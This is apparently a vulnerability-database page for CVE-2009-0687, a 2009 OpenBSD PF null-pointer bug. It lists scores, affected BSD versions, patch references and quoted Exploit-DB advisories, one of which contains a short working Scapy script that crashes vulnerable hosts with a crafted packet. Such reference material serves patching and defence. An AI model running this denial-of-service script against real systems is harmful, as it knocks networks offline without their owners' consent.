CVE-2009-0687
published 2009-08-11CVE-2009-0687: The pf_test_rule function in OpenBSD Packet Filter (PF), as used in OpenBSD 4.2 through 4.5, NetBSD 5.0 before RC3, MirOS 10 and earlier, and MidnightBSD…
PriorityP342high7.8CVSS 2.0
AVNACLAuNCNINAC
EXPLOIT
EPSS
9.52%
94.8th percentile
The pf_test_rule function in OpenBSD Packet Filter (PF), as used in OpenBSD 4.2 through 4.5, NetBSD 5.0 before RC3, MirOS 10 and earlier, and MidnightBSD 0.3-current allows remote attackers to cause a denial of service (panic) via crafted IP packets that trigger a NULL pointer dereference during translation, related to an IPv4 packet with an ICMPv6 payload.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| midnightbsd | midnightbsd | — | — |
| mirbsd | miros | <= 10 | — |
| netbsd | netbsd | — | — |
| openbsd | openbsd | — | — |
| openbsd | openbsd | — | — |
| openbsd | openbsd | — | — |
| openbsd | openbsd | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Multiple Vendor - PF Null Pointer Dereference
exploitdb·2009-04-30
CVE-2009-0687 Multiple Vendor - PF Null Pointer Dereference
Multiple Vendor - PF Null Pointer Dereference
---
_ _ _____ _ ___ _____ _ _
/ / / / ____/ / / _/_ __/ / / /
/ /_/ / __/ / / / / / / / /_/ /
/ __ / /___/ /____/ / / / / __ /
/_/ /_/_____/_____/___/ /_/ /_/ /_/
Helith - 0815
Author : Rembrandt
Date : 2009-04-30
Found : 2009-04-09
Affected Software: PF (OpenBSD Packet Filter)
Affected OS : OpenBSD 4.2 up to 4.5 and HEAD branch up to 2009-04-11
NetBSD 5.x up to RC3 and HEAD branch up to 2009-04-13
MirOS #10 and earlier
MidnightBSD 0.3-current
Not affected OS : FreeBSD
NetBSD 3.x, 4.x, 5.x (patched before release)
DragonflyBSD
Debian GNU/kFreeBSD
MidnightBSD prior 0.3
Older versions of OpenBSD PF and products based
thereon might be affected as well.
The Bug was introduced between the OpenBSD 4.1 and 4.2
release.
Type : Denial of Service
O
Exploit-DB
OpenBSD 4.5 - IP datagram Null Pointer Deref Denial of Service
exploitdb·2009-04-14
CVE-2009-0687 OpenBSD 4.5 - IP datagram Null Pointer Deref Denial of Service
OpenBSD 4.5 - IP datagram Null Pointer Deref Denial of Service
---
import sys
from scapy import *
victim=sys.argv[1]
icmpv6=58
p=IP(dst=victim)
p.proto=icmpv6
sr(p,timeout=1)
# milw0rm.com [2009-04-14]
Exploit-DB
OpenBSD 4.5 - IP datagrams Remote Denial of Service
exploitdb·2009-04-13
CVE-2009-0687 OpenBSD 4.5 - IP datagrams Remote Denial of Service
OpenBSD 4.5 - IP datagrams Remote Denial of Service
---
_ _ _____ _ ___ _____ _ _
/ / / / ____/ / / _/_ __/ / / /
/ /_/ / __/ / / / / / / / /_/ /
/ __ / /___/ /____/ / / / / __ /
/_/ /_/_____/_____/___/ /_/ /_/ /_/
Helith - 0815
Author : Rembrandt
Date : 2009-04-09
Affected Software: OpenBSD Kernel
Affected OS : OpenBSD 4.{3,4,5}, OpenBSD-current
Propably older versions are affected as well
Type : Denial of Service
OSVDB :
Milw0rm :
CVE :
ISS X-Force: :
BID :
Secunia : 34676
VUPEN ID :
Trying to fix it responsible and get in contact with the vendor:
-- OpenBSD --
Contacted 2009-04-09 15:35 GMT+1
Patch avaiable 2009-04-11 23:43 UTC
We received no response nor a notification about an upcoming patch by
the developers.
-- END --
OpenBSDs PF firewall in OpenBSD 4.3 up to OpenBSD-current
No writeups or analysis indexed.
ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.3/common/013_pf.patchhttp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2009-001.txt.aschttp://www.helith.net/txt/multiple_vendor-PF_null_pointer_dereference.txthttp://www.openbsd.org/errata43.html#013_pfhttp://www.openbsd.org/errata44.html#013_pfhttp://www.openbsd.org/errata45.html#002_pfhttp://www.osvdb.org/53608http://www.securityfocus.com/archive/1/502634http://www.vupen.com/english/advisories/2009/1015https://exchange.xforce.ibmcloud.com/vulnerabilities/49837https://www.exploit-db.com/exploits/8406https://www.exploit-db.com/exploits/8581ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.3/common/013_pf.patchhttp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2009-001.txt.aschttp://www.helith.net/txt/multiple_vendor-PF_null_pointer_dereference.txthttp://www.openbsd.org/errata43.html#013_pfhttp://www.openbsd.org/errata44.html#013_pfhttp://www.openbsd.org/errata45.html#002_pfhttp://www.osvdb.org/53608http://www.securityfocus.com/archive/1/502634http://www.vupen.com/english/advisories/2009/1015https://exchange.xforce.ibmcloud.com/vulnerabilities/49837https://www.exploit-db.com/exploits/8406https://www.exploit-db.com/exploits/8581
2009-08-11
Published